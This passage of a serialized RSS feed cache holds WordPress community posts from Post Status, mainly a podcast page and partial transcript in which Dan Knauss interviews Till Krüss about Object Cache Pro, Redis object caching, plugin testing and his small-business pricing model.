WP.</p>\n\n\n\n<p>But I wish we had more of these conversations in WP. </p>\n\n\n\n<p>It\'d be better for all of us. </p>\n\n\n\n<p>I grant it\'ll be tough &#8230; but I believe in us. </p>\n\n\n\n<p>Let\'s acknowledge that we need to talk &#8230; together.</p>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Oct 2022 15:55:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Cory Miller\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:116:\"Post Status: Till Krüss on Object Cache Pro, WordPress, Plugins, Testing, and Performance — Post Status Draft 126\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=127872\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"https://poststatus.com/till-kruss-on-object-cache-pro-wordpress-plugins-testing-and-performance/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:65548:\"<div class=\"wp-container-17 wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\"><strong>Till Krüss</strong> explains how he found his way into WordPress and a successful business that\'s solving the hard problems of caching and performance optimization. His work and business model suggest several areas of opportunity for developers and founders working in the WordPress plugin market today. </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n\n<p class=\"yoast-reading-time__wrapper\"><span class=\"yoast-reading-time__icon\"></span><span class=\"yoast-reading-time__spacer\"></span><span class=\"yoast-reading-time__descriptive-text\">Estimated reading time:  </span><span class=\"yoast-reading-time__reading-time\">3</span><span class=\"yoast-reading-time__time-unit\"> minutes</span></p>\n</div></div>\n\n\n\n<p class=\"has-drop-cap\">Back in August, I had a long conversation with <strong>Till Krüss</strong> (edited down to &lt;60 minutes here) about his path into <strong>WordPress</strong>, <strong>Laravel</strong>, and performance. It\'s about time we published it as an episode of <strong>Post Status Draft</strong>!</p>\n\n\n\n<p>Till is the developer and owner of <strong>Object Cache Pro</strong>, &#8220;a business class <strong>Redis</strong> object cache backend for WordPress.&#8221; OCP offers a unique and highly successful model for partnerships between a WordPress plugin product business and two valuable niche markets: hosting companies (B2B) for $1950/month and anyone running WordPress sites at scale (D2C) for $95/month. <strong>Nexcess</strong> is <a href=\"https://www.nexcess.net/blog/nexcess-to-provide-premium-caching-to-all-customers-with-new-object-cache-pro-partnership/\">the latest host to adopt</a> OCP, which they announced earlier this week.</p>\n\n\n\n\n\n\n\n<blockquote><p>What plugin owner has not felt the pain of an extraordinarily busy support forum? Till is up to (wait for it..) 10 <em>minutes</em> a day on support — which he aims to decrease to five minutes. How? End-to-end unit testing to ensure the highest code quality.</p></blockquote>\n\n\n\n<p>Performance optimization in general — and caching in particular — are <a href=\"https://poststatus.com/2022-web-almanac-cms-report/\">possibly the oldest and most persistent hard problems</a> for people running WordPress and similar applications at scale. Historically, performance has been a problem passed to the hosting industry by WordPress developers and users of too many plugins — or too many plugins that use too many server resources, especially as measured in database queries. </p>\n\n\n\n<p class=\"eplus-wrapper\">Till’s particular niche is not for everyone, but some of his ideas and achievements are very portable. For one thing, what plugin owner has not felt the pain of an extraordinarily busy support forum? Till is up to (wait for it&#8230;) 10 <em>minutes</em> a day on support — which he aims to decrease to five minutes. How? End-to-end unit testing to ensure the highest code quality. It’s an idea that needs to become a reality and a habit in the third-party WordPress product ecosystem, Till believes — and I think he’s right about that.</p>\n\n\n\n<h2>Test Everything, End-to-End</h2>\n\n\n\n<p>A large part of the challenges people have with WordPress in the wild have to do with plugins that have not been built and tested to perform at scale. There’s likely a lot of opportunity in aligning people on performance as a key, common interest. What people are these? Product, agency, and hosting companies in the WordPress space. <em>And</em>, as Till’s example shows, a small WordPress company, or company of one that wants to stay that way, still can thrive today.</p>\n\n\n\n<h2>Quality Product = Nearly No Support Needs</h2>\n\n\n\n<p>Traditionally, plugin owners have struggled with burdensome customer support, and having to resort to support as a customer is always an unwanted burden. Neither party wants to relate primarily through the support desk! So &#8230; why not just eliminate it or diminish support needs as much as possible? It\'s a win for everyone, and resources go into product development, another win-win. </p>\n\n\n\n<h2>Pricing and Value</h2>\n\n\n\n<p>Object Cache Pro\'s sales and distribution through hosting partnerships leave support obligations with the hosting partner and their own customers. The value to hosts is how they can bundle OCP, a high-value product, at a low cost to their customers\' hosting plans. This leaves OCP focused on product development, quality assurance, and lower support/maintenance costs — which is in everyone\'s interest. </p>\n\n\n\n<p>Object Cache Pro\'s Direct-to-Consumer pricing has no SaaS component. It does come with support, but customers are expected to install and maintain OCP themselves without an additional white-glove support plan. The value proposition: It just works and delivers incredible performance gains that have a quantifiable dollar value on high-traffic sites.</p>\n\n\n\n<h2>Should we continue this conversation?</h2>\n\n\n\n<p><em>If you\'re interested in a follow-up</em> conversation with Till or have questions about the things we covered in this one, please get in touch. Let us know if you\'d like to hear a follow-up episode about the risks that come with the opportunities of a small open-source<em> company with a high-value product. For one thing, there are the pirates and the sharks — anyone who might steal, buy, or recreate a GPL product and kill or dilute its profitability. How do you cope with that? </em><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f914.png\" alt=\"🤔\" class=\"wp-smiley\" /><em> </em></p>\n\n\n\n<div class=\"wp-container-20 wp-block-columns Pressable has-theme-palette-8-background-color has-background\" id=\"Pressable\">\n<div class=\"wp-container-18 wp-block-column\">\n<h3><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f64f.png\" alt=\"🙏\" class=\"wp-smiley\" /> Sponsor: <a href=\"https://poststat.us/pressable\">Pressable</a></h3>\n\n\n\n<p>Founded in 2010, <strong>Pressable</strong> is a world-class managed WordPress hosting provider built on the same data network as <strong>WordPress.com</strong> and <strong>WordPress VIP</strong>. With industry-leading performance, 24/7 expert support, a 100% uptime guarantee, and seamless integrations with <strong>WooCommerce</strong> and <strong>Jetpack</strong>, Pressable provides the tools you need to manage your WordPress websites and grow your business all in one place.</p>\n</div>\n\n\n\n<div class=\"wp-container-19 wp-block-column is-vertically-aligned-center\">\n<a href=\"https://poststat.us/pressable\"><img src=\"https://cdn.poststatus.com/wp-content/uploads/2022/01/pressable-icon-primary.svg\" alt=\"Pressable\" class=\"wp-image-121339\" width=\"150\" title=\"Pressable\" /></a>Pressable\n</div>\n</div>\n\n\n\n<h3 class=\"eplus-wrapper\" id=\"h-mentioned-in-the-show\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f517.png\" alt=\"🔗\" class=\"wp-smiley\" /> Mentioned in the show:</h3>\n\n\n\n<ul class=\"eplus-wrapper\"><li><strong>Till Krüss</strong>&#8216;s <a href=\"https://objectcache.pro/\" target=\"_blank\" rel=\"noreferrer noopener\">Object Cache Pro</a> is a (closed-source) commercial product that grew out of and is developed alongside <a href=\"https://wordpress.org/plugins/redis-cache/\">Redis Object Cache</a>. (100k+ installs on WordPress.org, numerous forks and stars on <a href=\"https://github.com/rhubarbgroup/redis-cache\">GitHub</a>.) <strong>Redis Object Cache</strong> is a fork of an unmaintained precursor <a href=\"https://ethitter.com/2014/04/redis-object-cache-plugin-available-for-download/\"><strong>Erick Hitter</strong></a> and <a href=\"https://ttmm.io/tech/ludicrous-speed-wordpress-caching-with-redis/\"><strong>Eric Mann</strong></a> launched <a href=\"https://poststatus.com/redis-object-cache-wordpress/\">in 2014</a>. </li><li><a href=\"https://relay.so/\" target=\"_blank\" rel=\"noreferrer noopener\">Relay</a> looks like it will be a successor to OCP as it\'s capable of speeds up to 100 times faster than Redis. It\'s a PHP extension developed in C that is both a Redis client and a shared in-memory cache.&#8221; There is a free Community version.</li><li><strong>Felipe Elia</strong> recently wrote a great explainer on <a href=\"https://felipeelia.dev/wordpress-object-cache-and-redis/\" target=\"_blank\" rel=\"noreferrer noopener\">WordPress, Object Cache, and Redis</a>.</li><li><strong>Do the_Woo</strong> <a href=\"https://dothewoo.io/the-evolution-of-woocommerce-and-wordpress-hosting/\">recently recorded</a> a very insightful open discussion on the Future of Hosting (and WordPress plugin business opportunities) where Till, <strong>Carl Alexander</strong>, and <strong>Zach Stepek</strong> traded insights and stories from their work with enterprise-class WordPress and WooCommerce.</li><li>Scaling WordPress (Post Status Draft #51) remains one of our all-time most listened-to podcast episodes, from 2016. <strong>Brian Krogsgard</strong> and <strong>Joe Hoyle</strong> take a pretty comprehensive look at WordPress performance and caching, including Redis.</li><li><strong>Jon Christopher</strong> is trying <a href=\"https://poststatus.com/who-benefits-from-a-decentralizing-plugin-ecosystem/\">a unique business strategy</a> with his <a href=\"https://organizewp.com/\" target=\"_blank\" rel=\"noreferrer noopener\">OrganizeWP</a> plugin that suggests cooperative ways to win outside centralized markets.</li><li><strong>Kevin Ohashi</strong>&#8216;s <a href=\"https://en-ca.wordpress.org/plugins/wpperformancetester/\">WP Performance Tester</a> plugin will test your server\'s raw capacity and show you how it compares to the current industry average established by Kevin\'s testing at <a href=\"https://wphostingbenchmarks.com/\">WP Hosting Benchmarks</a>.</li><li><strong>Mark Jacquith</strong>&#8216;s <a href=\"https://wordpress.org/plugins/cache-buddy/\" target=\"_blank\" rel=\"noreferrer noopener\">Cache Buddy</a> (2015) &#8220;[m]inimizes the situations in which logged-in users appear logged-in to WordPress, which increases the cacheability of your site.&#8221;</li><li><strong>Shaun Kester</strong>&#8216;s <a href=\"https://skfox.com/2008/10/09/latency-tracker-phpmysql-tracking-for-wordpress/\">Latency Tracker</a> (2008) was a helpful diagnostic when pre-&#8220;Managed WordPress&#8221; hosts were struggling to keep up with the booming use (and abuse) of self-hosted WordPress and other <strong>PHP</strong>/<strong>MySQL</strong>-based publishing platforms. </li><li><strong>Paul Jarvis </strong><a href=\"https://unemployable.com/podcast/company-of-one/\">talks about his book</a>, <em><a href=\"https://www.goodreads.com/en/book/show/37570605-company-of-one\">Company of One: Why Staying Small Is the Next Big Thing for Business</a></em>, with <strong>Brian Clark</strong> at <strong>Unemployable</strong>. </li><li>The <a href=\"https://make.wordpress.org/performance/\">WordPress Core Performance Team</a> is dedicated to monitoring, enhancing, and promoting performance in WordPress core and its surrounding ecosystem. We build and manage the <a href=\"https://wordpress.org/plugins/performance-lab/\">Performance Lab plugin</a>, a collection of performance-related “feature projects” for WordPress core.</li></ul>\n\n\n\n<h3 class=\"eplus-wrapper\" id=\"h-you-can-follow-post-status-and-our-guests-on-twitter\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f426.png\" alt=\"🐦\" class=\"wp-smiley\" /> You can follow Post Status and our guests on Twitter:</h3>\n\n\n\n<ul class=\"eplus-wrapper\"><li><a href=\"https://twitter.com/tillkruss\">Till Krüss</a> (Founder, <a href=\"https://www.linkedin.com/company/rhubarb-group/\">Rhubarb Group</a>)</li><li><a href=\"https://twitter.com/dan_knauss\">Dan Knauss</a> (Editor, <a href=\"https://twitter.com/post_status\">Post Status</a>)</li><li><a href=\"https://twitter.com/lemonadecode/photo\">Olivia Bisset</a> (Intern, Post Status)</li></ul>\n\n\n\n<p class=\"eplus-wrapper has-background\">The <strong>Post Status Draft</strong> podcast is geared toward WordPress professionals, with interviews, news, and deep analysis. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f4dd.png\" alt=\"📝\" class=\"wp-smiley\" /><br /><br /><a href=\"https://poststatus.com/category/post-status-podcasts/\" target=\"_blank\" rel=\"noreferrer noopener\">Browse our archives</a>, and don’t forget to subscribe via <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\" target=\"_blank\" rel=\"noreferrer noopener\">iTunes</a>, <a href=\"https://podcasts.google.com/feed/aHR0cHM6Ly9mZWVkcy5zaW1wbGVjYXN0LmNvbS8ySkU5c2M4UA\" target=\"_blank\" rel=\"noreferrer noopener\">Google Podcasts</a>, <a href=\"https://www.youtube.com/c/PostStatus\" target=\"_blank\" rel=\"noreferrer noopener\">YouTube</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\" target=\"_blank\" rel=\"noreferrer noopener\">Stitcher</a>, <a href=\"https://wordpress-post-status-draft-podcast.simplecast.com/\" target=\"_blank\" rel=\"noreferrer noopener\">Simplecast</a>, or <a href=\"https://feeds.simplecast.com/2JE9sc8P\">RSS</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f3a7.png\" alt=\"🎧\" class=\"wp-smiley\" /></p>\n\n\n\n<h2 class=\"eplus-wrapper\" id=\"h-transcript\">Transcript</h2>\n\n\n\n<h3><strong>Intro</strong>duction</h3>\n\n\n\n<p><strong>Till Krüss:</strong> [00:00:00] I forked it and now it grew to like, I don\'t know, a hundred thousand users probably a lot more because most people just use the upstream object cash drop and not the full plugin. I know that, um, Cloud Linux is using now Spin up, WP Blue Host. A lot of big hosts are using it.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> I\'m here with Till..</p>\n\n\n\n<p><strong>Till Krüss:</strong> <em>Krüss</em>.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> &#8230;and we\'re going to be talking about Object Cache Pro, which Till launched at the end of 2019. It\'s a business class Redis Object Cache backend for WordPress that\'s used by GoDaddy, Pagely Nexus Cloud Ways, and Convesio. The free, open-source version, Redis Object Cache is available at wordpress.org on the plugin repo.</p>\n\n\n\n<p>It makes WordPress much, much faster. Till\'s also building [00:01:00] Relay Redis client that\'s two orders of magnitude (100x) faster, and there are Laravel, WordPress, and Magento integrations for it. Till\'s a company of one and has a really unique view of how he wants to do business in the WordPress space. We\'ll spend some time talking about that, how Till got into WordPress in the first place as a very self-taught developer.</p>\n\n\n\n<p>And we\'ll talk about performance and testing in the WordPress plugin ecosystem. Why there needs to be more of it and why this matters to WordPress\'s Growth and competitiveness. Before we get into that, let me tell you about one of our great sponsors, Pressable. Founded in 2010. Pressable is a world class managed WordPress hosting provider built on the same data network as wordpress.com and WordPress VIP.</p>\n\n\n\n<p>Their state of the [00:02:00] art platform empowers agencies, freelancers, e-commerce businesses, IT professionals, and WordPress developers. To build, launch, and maintain amazing WordPress websites quickly, easily, and affordably with industry leading performance 24/7 expert support, a hundred percent uptime guarantee, and seamless integrations through commerce and Jetpack.</p>\n\n\n\n<p>Pressable provides the tools you need to manage your WordPress websites and grow your business all in one place. They\'ve also got a really cool demo system now. It\'s called My Pressable Playground, and you can create sites back in there. Edit the settings for each. Look at the security tools performance, other site management tools, and check out the Pressable API. For more advanced users, there\'s a robust REST API that you can develop applications on. It\'s all pretty open there and get a full view of everything. Just click the big &#8220;try for free&#8221; [00:03:00] button and give Pressable a try.</p>\n\n\n\n<h3>Dialogue Starts</h3>\n\n\n\n<p>So your main vocation, these, these days is, uh, am I right that what you\'re spending most of your time on is, is Object Cash Pro?</p>\n\n\n\n<p><strong>Till Krüss:</strong> Yeah. It\'s a 50 50 split, more or less between object, cash, Pro and relay. Right. Which hasn\'t really, you know,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> been too public. Relay that\'s, um, how much is, is that coming back into WordPress?</p>\n\n\n\n<p>That\'s a kind of a larger PHP project.</p>\n\n\n\n<p><strong>Till Krüss:</strong> Yeah. Without, you know, diving off the deep end here, essentially, I spoke with a bunch of people. The result was Object Cash Pro. And once I released this, you know, enterprise grade object cashing solution hosting companies came to me and be like, Hey, we want even more performance.</p>\n\n\n\n<p>And then the last two years, me and Michael, um, mostly him, but the [00:04:00] last two years we spent building Relay because it\'s the, it\'s a nice addition. And to answer your question about, Back to WordPress is like, yes. However, we are expanding into the, The extension works with laville magenta, with all PHP frameworks, messes.</p>\n\n\n\n<p>It\'s not only restricted to WordPress, but I assume this is gonna be the right dominant market. The first couple of years object. Cing is a very WordPress specific term. You see it here and there in other frameworks, but often it\'s just called caching. They just say, Hey, we just throw something into the cash and.</p>\n\n\n\n<p>Then they differentiate between page caching and all the other things. In WordPress, it\'s a specific term called object caching, but really it\'s, it\'s a, yeah, it\'s a WordPress specific thing.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> So what, what, how would you define object caching? I have kind of a metaphor, simplification for it in my, in my mind.</p>\n\n\n\n<p>But what\'s, what\'s a semi-technical. Deeper technical understanding of, of what we\'re doing [00:05:00] with object caching in, in WordPress,</p>\n\n\n\n<p><strong>Till Krüss:</strong> how I define it. There\'s some really good articles written out there. I think someone just posted something a few days ago. I dunno if I can pull this up right now. Um, Interesting Filipe ira.</p>\n\n\n\n<p>Yes. He just posted something. . We should put his initial notes. He has nice illustrations and he explains it. Um, essentially object hashing is you, you know, database might MariaDB all the S SQL queries that typically quite slow at scale, the more low you put on it. If you have a thousand people asking questions at the send them, it can be a bit much so at word pr Let\'s.</p>\n\n\n\n<p>You want to fetch the most recent comments and it gives you 20 comments instead of always asking your database server for it, you throw it into the object cash. I\'m doing air quotes here, which can be backed by many different service or architectures. In my case with object [00:06:00] cash Pros, cuz I think it\'s a really neat piece of software home and.</p>\n\n\n\n<p>Instead of, you know, the next couple of visitors, they don\'t have to ask the database. You don\'t have to wait your time to first buy. It doesn\'t increase. You can just throw it into Redis and retrieve it really, really quickly. And Redis doesn\'t really break a sweat. If you have a thousand people asking questions, it\'s fine.</p>\n\n\n\n<p>Maybe at a hundred thousand, a million, then you know, it starts to consume some resources. But it\'s just a really, really fast key value store. And. Ultimately object cashing helps you reduce the load on your database, which in most cases, I wanna say unless you have these, you know, 250 plugin, web percent stalls.</p>\n\n\n\n<p>Yeah. Big chunk of your response time is always taking up by talking to the database, right? Mm-hmm. ,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> I, I haven\'t seen a lot of 250 plugin my press installs. You run into those very often.</p>\n\n\n\n<p><strong>Till Krüss:</strong> Uh, I don\'t, I not directly, but [00:07:00] you know, working. The guys at Page Lee and some other hosting companies I see. Really horrendous What setups that it\'s, it feels abusive, what they\'re doing.</p>\n\n\n\n<p>It\'s just, it\'s, it\'s cruel what, what they\'re doing with the service.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Right? Yeah. I I\'m sure there\'s, there\'s plenty of, We\'ve probably touched a few of those here and here and there. Everyone\'s experience, um, just keep adding to it. Mm-hmm. . But the, the thing with Adri cash, um, That\'s really valuable is it doesn\'t matter whether those queries come from the back end or whether you\'re in the Yeah.</p>\n\n\n\n<p>Unit or not. And that\'s traditionally been people are working, um, doing a lot of writing inside their content management. And then if you have multiple users back there, there\'s really nothing that traditional cash would. Offer you. I remember there was this old plugin, um, I used for a long time. Mark Jake with, had written that, um, did try to do some smart things to cash some on the back end, [00:08:00] um, when you had multiple users going, but.</p>\n\n\n\n<p>Uh, if, if you\'re caching, well, it\'s not, Is it caching queries? Um,</p>\n\n\n\n<p><strong>Till Krüss:</strong> yeah, , it\'s unclear. Um, it\'s not a query. Cash query caching would be select user one from, you know, WP Onco users that would be specifically cashing this result. And some MyQ Marie BI was actually do this internally. If the same query happens, then they just send a cash response.</p>\n\n\n\n<p>It\'s more that WordPress says, Hey, I wanna. Look up this one user and then WordPress function itself. Check, Do I already have this in cash? Instead of cashing the query, it just cashes the object. Hence object cashing. But to speak to what you said earlier, they\'re just there. Yes. The advantage of object cashing, I always, I\'m so involved in it, so I forget how to properly explain it.</p>\n\n\n\n<p>Maybe in the, Explain to me like I\'m five, the big advantages. It\'s easy to install a plugin like WP Rocket or. , [00:09:00] I don\'t know what the go-to standard is nowadays to get some browser cashing going. So if you have anonymous traffic, if you have the Google crawler going to your website, that you serve these static pre-generated HDML files.</p>\n\n\n\n<p>So you don\'t have even talk to anything, you just, the server just has to redefine and send it back, which is really, really fast, like milliseconds. However, the moment you\'re logged in, if you have a community. Buddy boss, or if you have something here, shopping cart with wms, you\'re not an anonymous visitor anymore.</p>\n\n\n\n<p>And then every request when you wanna browse to the next category in wms, for example, you always have to talk to my sequel. And now if you do a flash sale with a thousand people at the same time on you site, You always will hit the object cash and it\'s just nice that it\'s whether you\'re in the back end, whether you are logged in, used on the front end with a shopping guard or you know, just commented, object cashing will reduce the response times of the page load times [00:10:00] for all of these requests.</p>\n\n\n\n<p>Not only anonymous traffic. It\'s really good to have both, to have a page cash and an object cash because you know, a fast back end, maybe even the page generation. when you run your, Hey, warm up my page cash would be faster because it doesn\'t have to hammer your my SQL server. Um, but yeah, that\'s, that\'s the, the essence, it, it cashes all requests or all it cashes.</p>\n\n\n\n<p>That\'s not true. It cashes many parts that affect all requests.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Right. Yeah. I noticed the big difference, uh, when we started using it, uh, with Pagely, and I think in some other context I have, um, yeah. Cause that\'s traditionally been the, the big problem with, with WordPress, if you\'re trying to use it as a community site or you, you\'ve got a forum or, uh, Yeah, some of a social site and a lot of people are logged in, so there\'s very little that.</p>\n\n\n\n<p>That page cashing would do anything for. So, um, [00:11:00] In my recollection, that was the major problem hosts had. There were more and more WordPress sites and others of its generation. They\'re all PHP in my sequel. Um, and so you would have someone just getting hammered with a lot of concurrent visitors. Maybe they don\'t.</p>\n\n\n\n<p>Maybe the page doesn\'t. Has like 50, a hundred queries. It\'s reasonable, but there\'s like 300 people doing that all at once. Or you have someone who has like the 250 plugins and it\'s like a hundreds of queries to load the, the front page. And it took a close look at that at one point with, uh, with another guy on the WordPress community.</p>\n\n\n\n<p>And um, you would see like one, even if it was one out of a hundred queries that just went. It just never came back. , and you wouldn\'t get a full page load. Um, was that, is that still a [00:12:00] scaling issue that every host has to deal with? Um, or is that becoming a thing of the past? With, with stuff like object</p>\n\n\n\n<p><strong>Till Krüss:</strong> cashing, having an object, Cash.</p>\n\n\n\n<p>And what press helps, um, because it\'s not really designed. To run a community to run these highly dynamic sites. We\'re making dm, we\'re making it work. I think the buddy boss guys talked to me recently and they said that just a load of feed of any given user, like you logged in, lot of feed. It\'s 300 my queries or SQL queries.</p>\n\n\n\n<p>Most people I think, use Marie db. I can\'t speak too much about what the challenges of hosting companies are. Um, I do see. Here and there, The stories and scaling the database over seems often an issue. I don\'t know what it\'s like in shared hosting. This is not my expertise, but yeah. Um, it\'s a, it\'s a hard [00:13:00] challenge to, to scale WordPress.</p>\n\n\n\n<p>That\'s, And it\'s my business now, it\'s, it\'s hard to scale and we have better tools, we have more powerful service. It\'s working, but it\'s, it\'s definitely pushing the edge of what it\'s meant to be doing initially. .</p>\n\n\n\n<p><strong>Dan Knauss:</strong> And is that how you got into this? Just because, well, you had a kind of history with WordPress and, and Lael, um, does it naturally, Does the nature of working with a WordPress for long lend itself to.</p>\n\n\n\n<p>Man, I gotta deal with some performance issues. Um, but what was your way into that? Becoming a</p>\n\n\n\n<p><strong>Till Krüss:</strong> main focus? Yeah, I was working as a freelancer and I was working on this really large Ttra community, um, as a women run company, which was kind of funny as like, I think when I left there was 50 women and me, and it was a fantastic work environment.</p>\n\n\n\n<p>I could say and. [00:14:00] The, It was like online learning, online courses. We didn\'t really have any tools when we started. I think I know 10 years ago, eight years ago, there was no good tools out there and at some point we started using Access Ally to connect with part and was just always a performance nightmare and I wanted to use an object answer.</p>\n\n\n\n<p>I ran into the same problem that now people run into and come to me essentially, or to other people like Pan. And they\'ve got a reddish caching plug in as well. That\'s, the data was just a sudden there so much load, page load signs were low and each page had, you know, three, 400 comments and just to load them, it was just not feasible to always ask the SQL Server and.</p>\n\n\n\n<p>Saw what\'s out there and it was kind of a bit dire, the situation. So I forked one of, I do not remember who it was. There was a popular Redis plugin, but Eric man, Eric man, I think way back in the day, released something where it was just unmaintained. I forked it, and now it grew to like, [00:15:00] I know a hundred thousand users probably a lot more because most people just use the upstream object cash drop and not the full plugin.</p>\n\n\n\n<p>I know that, um, Cloud Linux is using now Spin up, WP Blue Host. A lot of big hosts are using it, so the 100,000 users might be with Misleading, and I just scratched my own itch. I needed a good Redis plugin and it just kept on growing. That\'s how I kind of, you know, got into this and got started with it. I, I needed faster page load times.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah, I think that\'s, that\'s a, not that un uncommon of a, of a story, but you, what\'s unique is to, to build a product as, as successful as, um, as Object Cash Pro, I imagine. Um, how many, how many hosting partners are you working with now with that? Because it\'s a, there\'s the free plugin, but then there\'s the, um, the, there\'s the, [00:16:00] I guess the.</p>\n\n\n\n<p>Top shelf, high, high end premium version, that that\'s, is that mostly gonna be of use to a hosting market?</p>\n\n\n\n<p><strong>Till Krüss:</strong> Um, yeah. And individual, like the small medium businesses that, you know, if you run an eCommerce side, and we have many customers like that. Mm-hmm. , they have eCommerce sites, they make $50,000 a month in revenue and they run their own either infrastructure, have a tiny engineering team.</p>\n\n\n\n<p>Two, three guys run their own infrastructure because often when you have these large scale sites, it\'s tricky to find a hosting company that will serve that. Right. And I recommend Pagely personally because they seem to be able to just scale out. Um, What was the question again? ,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> I\'m thinking Yeah. Whether I That was hosting buttons.</p>\n\n\n\n<p>Yeah. Answered it. Yeah. If so, there are larger, So, so the, the client market for object cash bros is not just hosts, but businesses that are large [00:17:00] enough where they\'re monthly revenue, they can quantify exactly what performance is costing them. Yes. So if you are shaving. Off $10,000 worth of bandwidth. You know, it\'s, it, you, you can be that precise about it.</p>\n\n\n\n<p>That that\'s, um, yeah. You know, this is a measurable quantity and your, your value is, um, auto, it sells itself, I suppose. Right. Is that, is that kind of how you</p>\n\n\n\n<p><strong>Till Krüss:</strong> approach? Yeah, and because I believe in open source, there\'s always the free version that gives you a lot of benefits already. Um, there\'s been these studies from Amazon, Walmart, Etsy.</p>\n\n\n\n<p>Google where every 10th of a second a hundred milliseconds page load delays cost you. I think 1% conversion rate. Companies who worry about those numbers, they should be using Object, cash Pro. Yeah. Or if you just want the best of the best.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah, there\'s that side of it too. That\'s it. It\'s probably fairly quantifiable what you\'re losing in customers.</p>\n\n\n\n<p>[00:18:00] Um, and just you\'re paying for less efficient, You\'re paying to lose customers if you, if you can\'t, can\'t serve, um, pages efficiently at scale. So, All right. Um, Do you want to talk more about your, your background and, and history, or do you like to, you know, I imagine there\'s some things farther back that maybe suggest some things about you and, and why you shaped your business this way, because, We\'ve talked about that before, and you know, this isn\'t, this isn\'t something you want to grow into, uh, a massive company where you become a manager of, of a support desk , or you, you know, that\'s under you.</p>\n\n\n\n<p>You\'ve got people, you\'ve got engineers and, and support people. Um, this is something you wanted to remain hands on and, um, in a particular way so, Are there things in your experience and you know, the rest of life that made you aware of that, [00:19:00] um, about yourself? Because, you know, the standard stereotypical model is let\'s like on, let\'s make this thing as big as we can.</p>\n\n\n\n<p>Like Yeah. Cava</p>\n\n\n\n<p><strong>Till Krüss:</strong> dozen,</p>\n\n\n\n<p>Um, yeah. I.</p>\n\n\n\n<p>I\'m neuro atypical and I, whatever. I touched a knife I wanted to do, figured out myself. I mean, I, I really enjoy learning from other people and I constantly ask other people about things and advice, but. Just seeing the standard model of you start a business, you get some funding, then you rent an offer, and I just, I can\'t be asked to, to do that.</p>\n\n\n\n<p>I, I wanna do things my way. That works for me, meaning working from home, I. In my underwear. Kind of, that\'s the, the picture you, you can visualize there. I, it works for me to be quiet by myself to focus time. If I want to take three [00:20:00] days off, I will and not be forced into this nine to five productivity model because it doesn\'t serve my, I don\'t wanna say best interest.</p>\n\n\n\n<p>I\'ve never really articulated this. Um, it doesn\'t work for me. It\'s, I work long, hard hours, sometimes months in a row and sometimes I just take time off and all I wanna do is mo lawn and go for work. That flexibility, I think, really allowed me to.</p>\n\n\n\n<p>maybe make the best product I could possibly make. And I just essentially, I just wanted to do things my way. Even with the pricing model, of course, looking at all the other WordPress plugins, this pricing model, I think hasn\'t changed in the last 10 years. Five years. I don\'t know what the first paid plugin was except for, was it, um, Kareem with crowd favorite?</p>\n\n\n\n<p>He had this one plug and I was, I dunno, [00:21:00] $500 a month or like some crazy amount, the, where you could migrate between sites with this one outlier. Everybody does the same pricing with, you know, a couple of dollars a month, maybe less than a hundred a year, and you get your unlimited license to me didn\'t work.</p>\n\n\n\n<p>I wanted to keep it small. I wanted to have a hundred customers that pay me a hundred dollars a month. That would be my full-time work and support a hundred companies individually. That was the initial intention support a hundred companies because I can\'t, that wouldn\'t, wouldn\'t be too far out of my capabilities and it wouldn\'t completely drown me in work.</p>\n\n\n\n<p>And so that\'s how I really priced ocp. This is, this is what I wanted and. What I\'m seeing now is that I can serve the WebPress industry much more by working with hosting companies, and I\'m talking with a lot more than, uh, 